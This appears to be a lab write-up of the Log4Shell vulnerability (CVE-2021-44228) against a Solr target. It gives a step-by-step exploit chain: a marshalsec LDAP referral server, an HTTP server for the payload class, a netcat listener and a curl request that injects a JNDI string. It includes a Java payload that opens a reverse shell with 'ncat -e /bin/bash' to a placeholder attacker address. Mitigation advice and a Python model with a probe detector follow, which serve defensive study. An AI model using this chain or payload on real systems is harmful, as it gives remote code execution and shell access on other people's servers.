Log4j2 Vulnerability Details: (CVE-2021-44228)

Info

Gist

The exploit chain consists of the following steps. `ATTACKER-IP` is the attacker's own address on the lab network (see `ip addr` under Useful commands); the target is a Solr instance on port 8983 whose admin handler logs the `foo` request parameter through Log4j.

  1. Start the LDAP referral server. It answers the target's JNDI lookup with a reference whose codebase points at the attacker's HTTP server, so the target JVM fetches and instantiates `Exploit.class` from there (this needs a JVM that still trusts remote LDAP codebases, see Vulnerable Versions):

     `/mnt/c/_TEMP/LOG4JHACK/jvm8/jdk1.8.0_181/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ATTACKER-IP:8000/#Exploit"`

  2. Serve the compiled `Exploit.class` from the directory that contains it. The port must match the URL handed to the referral server:

     `python3 -m http.server 8000`

  3. Listen for the reverse connection that the payload opens:

     `nc -lnvp 9999`

  4. Trigger the lookup by injecting the JNDI string into a request parameter the target logs. Inside single quotes the shell does not expand `${...}`, so no backslash escaping is needed; 1389 is the referral server's default LDAP port and the path after it is arbitrary:

     `curl 'http://TARGET-IP:8983/solr/admin/cores?foo=${jndi:ldap://ATTACKER-IP:1389/kuchbhi}'`

Vulnerable Versions

  • Java 1.8.0_181 (jdk-8u181). JDK releases before 8u191 default `com.sun.jndi.ldap.object.trustURLCodebase` to true, so the JNDI client loads `Exploit.class` from the remote codebase. From 8u191 onward the default is false and this remote-codebase variant fails (the lookup itself still fires, and other loading routes exist).
  • Log4j 2.14.1 (log4j-api:2.14.1 alongside log4j-core:2.14.1; the lookup code that evaluates `${jndi:...}` lives in log4j-core). CVE-2021-44228 affects Log4j 2 from 2.0-beta9 through 2.14.1.

Useful commands :

  • `sudo openvpn file.ovpn` (connect to the lab network)
  • `ip addr show | grep inet | grep global` (find the address to use as ATTACKER-IP)
  • `nc -lnvp 9999` (reverse-shell listener)
  • `python3 -m http.server 8000` (serve Exploit.class)
  • `curl 'http://TARGET-IP:8983/solr/admin/cores?foo=${jndi:ldap://ATTACKER-IP:9999}'` (callback check: with nc listening on 9999, an incoming connection shows the target evaluates the lookup and can reach you, before the LDAP server is set up; the full chain points at port 1389)
  • `mvn clean package -DskipTests` (build marshalsec into target/marshalsec-0.0.3-SNAPSHOT-all.jar)

Payload

The Java payload is a class whose static initializer runs as soon as the target JVM loads it from the attacker's HTTP server:

```java
// Exploit.java: compiled to Exploit.class and served by the http.server in step 2.
// The JNDI client instantiates the class referenced by the LDAP result, so the
// static initializer below executes on the target at class-load time.
public class Exploit {
    static {
        try {
            // Reverse shell back to the nc listener from step 3 (requires ncat on the target).
            java.lang.Runtime.getRuntime().exec("ncat -e /bin/bash ATTACKER-IP 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

Compile it with the same JDK the target runs (`javac Exploit.java` using the jdk1.8.0_181 toolchain above); a class file produced by a newer javac is rejected by an older JVM with `UnsupportedClassVersionError` and the chain silently stops at the class load.

Mitigation

  • Upgrade log4j-core to 2.17.1 or later. 2.15.0 disabled message lookups by default, 2.16.0 removed them and disabled JNDI entirely by default, and 2.17.x fixed the remaining follow-on issues. Upgrading is the only complete fix.
  • Stopgap on 2.10 through 2.14.1: start the JVM with `-Dlog4j2.formatMsgNoLookups=true`, or set the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`.
  • What the flag does: Log4j emits the message text verbatim instead of passing it through its string substitutor, so `${jndi:...}` (and any other `${...}` lookup) inside a logged message is never evaluated.
  • What it does not cover: the flag does not exist before 2.10, and it only applies to the message. Lookups configured in the layout pattern are still evaluated, so a configuration such as `$${ctx:loginId}` in the PatternLayout remains exploitable through attacker-controlled Thread Context data (CVE-2021-45046). For those cases, remove the lookup class from the jar instead: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`
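To make concrete both how the injected string in step 4 reaches the JNDI lookup and what the formatMsgNoLookups flag actually switches off, the following is an added Python model written for this page; it is not code from the page's author or from Log4j. It reimplements only the small part of Log4j's string substitutor needed here: nested `${...}` resolution, the `:-` default syntax, and the real `lower`/`upper` lookups, with the `jndi` lookup replaced by a stub that records the URL instead of connecting. The `no_lookups` argument stands in for `log4j2.formatMsgNoLookups=true`. The sample log lines are constructed, not captured traffic, and the detector that uses the same resolver to collapse obfuscated variants is this page's addition, not a Log4j feature.

```python
import re
from typing import Callable, Dict, List, Optional
from urllib.parse import unquote

# Toy model of the Log4j 2.x StrSubstitutor used when formatting a log message.
# The real engine is org.apache.logging.log4j.core.lookup; this keeps just enough
# to show how ${jndi:...} and its common obfuscations resolve. No network access.


class LookupEngine:
    """Resolves ${prefix:key[:-default]} variables, innermost first."""

    def __init__(self) -> None:
        self.jndi_requests: List[str] = []      # URLs the jndi stub would have fetched
        # lower/upper are real Log4j lookups; jndi is replaced by a recorder.
        self.lookups: Dict[str, Callable[[str], Optional[str]]] = {
            "lower": lambda key: key.lower(),
            "upper": lambda key: key.upper(),
            "jndi": self._jndi_stub,
        }

    def _jndi_stub(self, key: str) -> Optional[str]:
        # Real Log4j calls InitialContext.lookup(key) here; for an ldap:// URL that
        # is the request that reaches the attacker's referral server.
        self.jndi_requests.append(key)
        return None  # treat the lookup as failed: Log4j then keeps the original text

    def resolve_variable(self, var: str) -> Optional[str]:
        """var is the text between ${ and } after inner variables were resolved."""
        default: Optional[str] = None
        if ":-" in var:                      # ${prefix:key:-default}; ${::-j} yields "j"
            var, default = var.split(":-", 1)
        prefix, sep, key = var.partition(":")
        handler = self.lookups.get(prefix) if sep else None
        value = handler(key) if handler else None
        return value if value is not None else default

    def substitute(self, text: str) -> str:
        out: List[str] = []
        i = 0
        while i < len(text):
            if text.startswith("${", i):
                end = self._matching_brace(text, i + 2)
                if end == -1:                # unterminated: emit the rest literally
                    out.append(text[i:])
                    break
                inner = self.substitute(text[i + 2:end])   # nested lookups first
                value = self.resolve_variable(inner)
                out.append(value if value is not None else "${" + inner + "}")
                i = end + 1
            else:
                out.append(text[i])
                i += 1
        return "".join(out)

    @staticmethod
    def _matching_brace(text: str, start: int) -> int:
        depth, i = 1, start
        while i < len(text):
            if text.startswith("${", i):
                depth, i = depth + 1, i + 2
                continue
            if text[i] == "}":
                depth -= 1
                if depth == 0:
                    return i
            i += 1
        return -1


def format_message(message: str, no_lookups: bool, engine: LookupEngine) -> str:
    """Message-formatting step: with log4j2.formatMsgNoLookups=true (no_lookups=True)
    the text is emitted verbatim and no lookup runs at all."""
    return message if no_lookups else engine.substitute(message)


def jndi_targets(message: str) -> List[str]:
    """URLs the jndi lookup would contact for this message under the default config."""
    engine = LookupEngine()
    engine.substitute(message)
    return engine.jndi_requests


JNDI_RE = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def is_jndi_probe(line: str) -> bool:
    """Scan one log line: URL-decode, then normalise nested lookups with an engine
    that has no jndi handler, so obfuscated forms collapse to a literal ${jndi:...}."""
    decoded = unquote(line)
    normaliser = LookupEngine()
    del normaliser.lookups["jndi"]           # never resolve jndi while scanning
    return bool(JNDI_RE.search(decoded) or JNDI_RE.search(normaliser.substitute(decoded)))


# Constructed sample lines (not real traffic): the page's probe, two obfuscated
# variants, a URL-encoded copy, and a benign request.
SAMPLE_LINES = [
    "GET /solr/admin/cores?foo=${jndi:ldap://ATTACKER-IP:1389/kuchbhi}",
    "GET /solr/admin/cores?foo=${${lower:J}ndi:ldap://ATTACKER-IP:1389/kuchbhi}",
    "GET /solr/admin/cores?foo=${${::-j}${::-n}${::-d}${::-i}:ldap://ATTACKER-IP:1389/kuchbhi}",
    "GET /solr/admin/cores?foo=%24%7Bjndi%3Aldap%3A%2F%2FATTACKER-IP%3A1389%2Fkuchbhi%7D",
    "GET /solr/admin/cores?foo=bar",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        param = unquote(line.split("foo=", 1)[1])
        print("PROBE" if is_jndi_probe(line) else "clean", jndi_targets(param),
              repr(format_message(param, True, LookupEngine())))
```

Running it shows the point of the mitigation section: every probe variant ends up as one `ldap://ATTACKER-IP:1389/...` request when lookups are on, and as an untouched string when `no_lookups` is set. It also shows why grepping access logs for the literal `${jndi:` is not enough; the `${::-j}` and `${lower:J}` forms only become recognisable after the same nested resolution the vulnerable logger performs.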

References